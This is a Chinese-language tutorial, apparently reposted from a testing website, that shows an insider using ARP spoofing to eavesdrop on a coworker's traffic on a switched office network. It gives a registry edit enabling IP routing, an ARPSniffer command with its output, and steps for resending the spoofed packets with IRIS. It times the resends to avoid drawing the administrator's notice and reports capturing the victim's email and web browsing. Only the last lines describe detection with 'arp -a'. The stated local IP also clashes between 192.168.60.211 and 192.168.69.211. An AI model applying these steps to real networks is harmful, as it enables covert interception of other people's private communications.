在内部交换网络窃听信息

内部使用交换机进行互联的网络其实也存在着很多安全隐患，尤其是内部的恶意员工更是可怕，对于稍微了解些网络知识的攻击者完全可以采取些好象“隔空取物”式的攻击方法比如ARP欺骗。

首先需要开启系统的IP Routing的功能；

修改注册表：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

增加一项：

Name:IPEnableRouter

Type:REG_DWORD

Value:0x01

需要重新启动系统才能生效。

我本地的IP地址是192.168.60.211这次我是想截获192.168.69.7和网关192.168.69.220之间的通讯，首先我们需要启动ARPSniffer（关于这个软件的详细信息访问这里http://www.netxeyes.org/main.html ）这个小软件帮助我们弄几个欺骗的样品包出来给IRIS用。

C:\>ARPSniffer.exe 192.168.69.220 192.168.69.7 * sql.txt 0
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) PRO/100 VE Network Connection
Enable IP Router....OK
Get 192.168.69.220 Hardware Address: 00-30-94-df-d5-81
Get 192.168.69.7 Hardware Address: 00-10-a4-ed-97-0f
Get 192.168.69.211 Hardware Address: 00-02-a5-9b-41-74

Spoof 192.168.69.7: Mac of 192.168.69.220 ===> Mac of 192.168.69.211
Spoof 192.168.69.220: Mac of 192.168.69.7 ===> Mac of 192.168.69.211

Begin Sniffer.........

0.6.0.0(0)->0.0.0.0(0)
      ?0.6.0.0(0)->0.0.0.0(0)
      ?192.168.69.74(138)->192.168.69.255(138)
0.6.0.0(0)->0.0.0.0(0)
      ?192.168.69.106(138)->192.168.69.255(138)
   

程序开始工作以后我们就可以直接把这个软件关掉了，因为这个软件工作的很不稳定，所以我还是选择利用IRIS来帮我们完成剩下的欺骗工作。

我们从IRIS抓到ARPSniffer发出的欺骗ARP数据包，然后选中它们再用鼠标右键选择发送这些网络数据包。

既然是ARP欺骗就需要持续的发送，延迟的时间我选择的是1000ms，太频繁的发送意义不大而且会引起管理员的注意。

然后，我们就可以直接用IRIS的应用信息还原的功能来直接查看ARP欺骗的成果了，这里我们成功的截获了192.168.69.7的收发邮件和WEB浏览信息，现在192.168.69.7所有通过网关的信息都会先经过我们的计算机进行转发，我们实际好象一个隐藏的中间人对所有信息秘密的窃听，利用IRIS我们可以同时对一个内部网络的多个结点进行欺骗。

是不是有点意思，ARP欺骗是在内部网络中非常流行的一种窃听网络信息的方法，由于内部网络速度很快所以被攻击者很难感觉出速度的影响，只有当被攻击者在本地执行ARP -A命令的时候才会发现点异常。

C:\>arp -a
Interface: 192.168.69.7 on Interface 0x2
  Internet Address      Physical Address      Type
  192.168.69.211        00-02-a5-9b-41-74     dynamic
  192.168.69.220        00-02-a5-9b-41-74     dynamic
   

看到网关和攻击者主机的MAC地址一样，显然是一次ARP攻击行为的特征。以后在公司上网也要小心了，你身边的人根本不用什么木马或者去费劲偷什么管理员的权限也可以轻松的对你进行监视了。

（责任编辑 Sunny）

原文转自：http://www.ltesting.net